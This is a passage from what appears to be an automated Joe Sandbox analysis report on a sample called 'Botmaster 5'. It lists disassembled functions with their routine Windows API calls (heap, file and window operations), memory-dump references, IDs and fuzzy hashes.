                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00990000,00000000,009905D0,?,0040482D,00000000,Error,Setup Error!,00000010,00000000,00000000,00000000,0046AFD4,0046AFD0,00000000,00000000), ref: 00429932
                                                                                                                                                                                                                  • HeapDestroy.KERNELBASE(00990000,?,0040482D,00000000,Error,Setup Error!,00000010,00000000,00000000,00000000,0046AFD4,0046AFD0,00000000,00000000,00000000,00000000), ref: 0042993F
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$DestroyFree
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2061148462-0
                                                                                                                                                                                                                  • Opcode ID: e0cfd02c9fda5d7d981f4ea9cec3dfbac6d6d3779556e713eede1efe1f7180e3
                                                                                                                                                                                                                  • Instruction ID: 93a63eddd6d778fd148805a9662fc1bc5fb15c3def77a8ae2af8f6cc3d98cfdf
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0cfd02c9fda5d7d981f4ea9cec3dfbac6d6d3779556e713eede1efe1f7180e3
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65D0C9B21406049BD604ABA4FC84E6637ACA34C701F00C025FA0542360EAF2A8408B6E
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004241FB Relevance: 2.5, APIs: 2, Instructions: 25memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,0040488D,00404828,00000000,Error,Setup Error!,00000010,00000000,00000000,00000000,0046AFD4,0046AFD0,00000000), ref: 00424232
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,0040488D,00404828,00000000,Error,Setup Error!,00000010,00000000,00000000,00000000,0046AFD4,0046AFD0,00000000), ref: 0042423F
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                                                                  • Opcode ID: 751035648aa5ab155d3877d49b310aae271599609d6165f7cea2a0dce6008a29
                                                                                                                                                                                                                  • Instruction ID: f3a659fc2d838a8713ca74972d65449b1acaf2411313cf7deed3883d21b92e38
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 751035648aa5ab155d3877d49b310aae271599609d6165f7cea2a0dce6008a29
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87E0ED31701120ABDB215B66FC01F2A7B69EB50790F4100B6F900A6174E6A5E820DBAA
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004072C6 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000449,?,00000000), ref: 00407320
                                                                                                                                                                                                                    • Part of subcall function 0041B430: RtlFreeHeap.NTDLL(009A0000,00000000,?,00000000,009A1000,?,?,?,004013C1,00000000,00000001,00000000), ref: 0041B466
                                                                                                                                                                                                                    • Part of subcall function 0041B430: FindCloseChangeNotification.KERNELBASE(00000000,009A1000,?,?,?,004013C1,00000000,00000001,00000000), ref: 0041B46F
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ChangeCloseFindFreeHeapMessageNotificationSend
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1776103676-0
                                                                                                                                                                                                                  • Opcode ID: c56e20f8c7b32fd87014468dc46684a52f155bb0e27c3105d7a0901b3188ee3c
                                                                                                                                                                                                                  • Instruction ID: b5a99b15929bdc8331d0d6a0ebd76d0ef305f321afd90ea148f0cdaf44abd2d0
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c56e20f8c7b32fd87014468dc46684a52f155bb0e27c3105d7a0901b3188ee3c
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E012C71108248FFE710EF14CC41FAFB7A8FB08318F50862AF899961A1D735AE54EB56
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00429C80 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • RtlReAllocateHeap.NTDLL(00990000,00000000,009905D0,000041FE,00000000,00000000), ref: 00429CCA
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                  • Opcode ID: 3354868321ce01b72d8a99e1c076c339d57701ea24fc00e0daa60a68813c2760
                                                                                                                                                                                                                  • Instruction ID: a765a9c29218d9e2383a526db55c045f35994c704923f4b84ce396db60a7d210
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3354868321ce01b72d8a99e1c076c339d57701ea24fc00e0daa60a68813c2760
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC016D70A01209EFC704CF5DE88096D7BB9FB88304F00C169E9459B324EBB1AA51CF9A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041B6A0 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000,009A1000,?,?,0040128A,00000000), ref: 0041B6E1
                                                                                                                                                                                                                    • Part of subcall function 0041B3F0: WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0041B671,00000000,009A1000,00000000,?,?,?,00401271,00000000), ref: 0041B415
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: File$PointerWrite
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 539440098-0
                                                                                                                                                                                                                  • Opcode ID: e7e32c98e37f9d04117ad91c354dbfad0267fcab7ef5d2df0e598f8231b29ad2
                                                                                                                                                                                                                  • Instruction ID: a0b2b9cad98a1670fa82f977ecc321190b2cc2a04679cfbdc0602d5b8ad39b60
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7e32c98e37f9d04117ad91c354dbfad0267fcab7ef5d2df0e598f8231b29ad2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AE0C971105710AFD724DF55D854FABB7E8EB84B14F00C90EF88546641D7B9EC44CBAA
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041B3F0 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0041B671,00000000,009A1000,00000000,?,?,?,00401271,00000000), ref: 0041B415
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                                                                                  • Opcode ID: cb52e1734a561d96ce3c9f8dea2d8f5f1be392f7e988f307c6cfd73ca2173b29
                                                                                                                                                                                                                  • Instruction ID: cfc3ef3abe4ace976f36a81e123d29923dbc5a2c1bbba71bfa5a2bbf1a9e31ca
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb52e1734a561d96ce3c9f8dea2d8f5f1be392f7e988f307c6cfd73ca2173b29
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23E0AEB6504700AFC324CF68D948C67B7E8EB88610B00CA2EE49B83A00E670F840CBA1
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00404952 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SetupIterateCabinetW.SETUPAPI(?,00000000,00000000,00000000), ref: 00404985
                                                                                                                                                                                                                    • Part of subcall function 00429A70: HeapFree.KERNEL32(00990000,00000000,00000000,00000004,?,?,0040A058,?,00001008,00401080,?,00001000,?,EBA9E800,00427D02,00001008), ref: 00429A88
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CabinetFreeHeapIterateSetup
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2752172957-0
                                                                                                                                                                                                                  • Opcode ID: 8adccb587d8f9f9fa73344fb244c5873bf9ba4bcf969a1d55aab789c80515c16
                                                                                                                                                                                                                  • Instruction ID: 13938370e49880db7dc9028a7542cfe5df055d2277e2a4862b5c6860b87247da
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8adccb587d8f9f9fa73344fb244c5873bf9ba4bcf969a1d55aab789c80515c16
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0E0C971108215AFC601EB61D952E6FB3A9EB94708F00882EF58592151DA359C15DB5B
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00427766 Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • LoadLibraryW.KERNELBASE(00000000,00001000,?,?,0041CB5B,FFFFFFFF,UxTheme.dll,00000000,00000000,0041CB18,00000008,00000000,00000000,00000007,00000018,00000000), ref: 00427785
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                  • Opcode ID: 658869a353c9d26645961156cdd54d2dbff233a0aee83849f1a12eb8ec2c901b
                                                                                                                                                                                                                  • Instruction ID: 42758c154f9ef456e5dc99ed17f38567165ae2a5027a2348c7d592c57e78b7ed
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 658869a353c9d26645961156cdd54d2dbff233a0aee83849f1a12eb8ec2c901b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42E0483160A371DB8B315B29AC0440BFBE5EBD07717464627F4A453261C7748C51CBEA
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00420C50 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00420C83
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: TextWindow
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 530164218-0
                                                                                                                                                                                                                  • Opcode ID: 99a8ac1963a4c29df49b57a75893e82dc80888c2d7ba1369d7e4bb049c3381f5
                                                                                                                                                                                                                  • Instruction ID: 4883f717ad03afa1b70d14508a056812c002e4108a943db761da5725105f783e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99a8ac1963a4c29df49b57a75893e82dc80888c2d7ba1369d7e4bb049c3381f5
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12E0DF75A01230DF9B2E5B22F80886B77E9BF40710B0981AEE80067325DB75DC01C79D
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00420C8D Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000005,00000000,004042F3,00000003,00000001,00000000,00000001,00000000,0000003D,00000001,00000001,00000001,00000001,00000000,00000001), ref: 00420CC2
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ShowWindow
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1268545403-0
                                                                                                                                                                                                                  • Opcode ID: edec3efa04815b1810acef98e2c2500e871fd00b378d9887a4aea7892cd027a4
                                                                                                                                                                                                                  • Instruction ID: 96869af61c9218d2abd46d89e73b4dd12f261ca4fe8b2813fcf3e63f9e4373e4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: edec3efa04815b1810acef98e2c2500e871fd00b378d9887a4aea7892cd027a4
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73E0DFB0309311EBDB0C4B12EE48B2B7BE2BF40700F40855EE401062B2D7788840DB0A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00421BC5 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CallWindowProcW.USER32(?,00000008,?,?), ref: 00421BFA
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CallProcWindow
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2714655100-0
                                                                                                                                                                                                                  • Opcode ID: 0ae53c13fdd9160a4d12fbd52b8d01040b0d8e93e3726a0d35a8ed284a9c904b
                                                                                                                                                                                                                  • Instruction ID: 20cecf23ee91380338ad2312598f1385f25b7f31d0c3c4015205ea465f801c55
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ae53c13fdd9160a4d12fbd52b8d01040b0d8e93e3726a0d35a8ed284a9c904b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2E01A31200118FBCF024F81EC05C9A3F75BB24311F80C426FA0958170D376A6B4EF49
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00421F34 Relevance: 1.5, APIs: 1, Instructions: 17windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00421F43
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3850602802-0
